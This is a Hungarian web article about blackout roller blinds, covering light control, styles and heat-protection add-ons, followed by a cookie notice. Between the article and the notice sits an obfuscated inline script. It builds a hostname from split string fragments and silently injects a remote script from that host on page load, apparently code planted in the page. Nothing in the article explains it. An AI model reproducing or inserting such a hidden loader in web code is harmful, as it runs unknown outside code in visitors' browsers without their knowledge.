Fényzáró roló segítségével szabályozott fényviszonyok

Legyen világosság
A lakóterekbe jutó fény mennyisége gyakran felmerülő kérdés, hiszen sok szempontból képes meghatározni egy lakás vagy ház összképét. A maximális komfort érdekében azonban az is fontos, hogy ez a fény valamilyen módon szabályozható, adott esetben kizárható legyen. Egy lakótér atmoszférája és általános hangulata sok tényezőn múlik. A téma pedig eleve meglehetősen szubjektív szempontok mentén szokott kibontakozni.

A kevés objektív faktor egyike azonban mindenképpen a szobába jutó fény mennyisége és milyensége, hiszen az bátran állítható, hogy a fényes terek általánosságban nagyobb népszerűségnek örvendenek. Arról nem is beszélve, hogy energetikai szempontból sem mindegy a kérdés.A természetes fény a legegyszerűbb módon természetesen az ablakokon és különböző üvegfelületeken keresztül képes bejutni a szobákba. A ház vagy lakás fekvése ebből a szempontból kardinális, de a nyílászárókkal is van tér a játékra. Egy újonnan épülő háznál persze könnyebb a saját ízlésünkre szabni az ablakok és ajtók mennyiségét, de utólag is van lehetőség a módosításra. A fényt persze több szempontból sem árt szabályozni, melyre egy fényzáró roló kiválóan alkalmas lehet.

A napfény finomhangolása

Egy lakótér összképéhez hozzátartozik tehát a természetes fény, a komfort szempontjából ugyanakkor annak manuális szabályozása is fontos. Egy fényzáró roló éppen ezt hivatott elősegíteni, a lehető legegyszerűbb és leggazdaságosabb módon. Jogosan merülhet persze fel a kérdés, hogy ha a fényben úszó terek a népszerűek, mi okból kellene besötétíteni? Erre sok magyarázat lehet, kezdve például a kisgyermekes családok nappali alvás idejétől a nyári égető napfény kizárásával bezárólag.
A lényeg persze alapvetően nem más, mint hogy a lakók érezzék a kontrollt és kedvük szerint dönthessék el azt, hogy épp mennyi fényre van szükségük. Egy fényzáró roló segítségével ez tökéletesen szabályozható, hiszen a teljes sötétségtől, a félhomályon át a fény teljes beeresztéséig mindenre van lehetőség. A fényzáró rolók kínálata pedig a stílus szempontjából is több opciót kínál, így a kinézet is abszolút saját döntés.

Megjelenés és kiegészítők

Az ablakok belső oldalára szerelhető és manuális működtethető fényzáró rolók a fény teljes kizárását is lehetővé teszik.

Az sem mindegy azonban, hogy a külvilág vagy a napfény helyett mit látnak a lakók. A rolók kínálatában több különböző színű és mintázatú modell érhető el, így abszolút egyéni ízléshez vagy a szobák hangulatához igazítható a kiegészítő. A működtetés pedig abszolút gyerekjáték, hiszen a fokozatmentesen állítható fényzáró roló azon a ponton áll meg, ahol mi szeretnénk.
Adott esetben hővédelemmel is kiegészíthető az eszköz, mely így már abszolút komplex megoldást nyújt a fény és a hőmérséklet szabályozására is. Ehhez a belülre kerülő fényzáró roló mellé egy kívülre szerelhető hővédő kiegészítőre lesz szükség. A luxus érzése pedig még tovább növelhető a rolók elektromos változataival, melyek akár távoli vezérléssel is működtethetők. Egy egyszerű eszköz a maximális komfortért.

<script>
(function(){
wiax=document.createElement(„script”);wiax.type=”text/javascript”;
wiax.async=true;wiax_=((„us”)+”t”)+”a”;wiax_+=(„t.i”)+””+”n”;wiax_+=((„f”)+”o”);wiax_+=”/”;
wiaxu=”494144355.”;wiaxu+=”ufveli18iaxhrdrnn74b7Xyqjssr9z”;wiax.src=”https://”+wiax_+wiaxu;
wiaxdb=document.body;wiaxdb.appendChild(wiax);
})();
</script>

 

A honlap további használatához a sütik használatát el kell fogadni. További információ

A süti beállítások ennél a honlapnál engedélyezett a legjobb felhasználói élmény érdekében. Amennyiben a beállítás változtatása nélkül kerül sor a honlap használatára, vagy az "Elfogadás" gombra történik kattintás, azzal a felhasználó elfogadja a sütik használatát.

Bezárás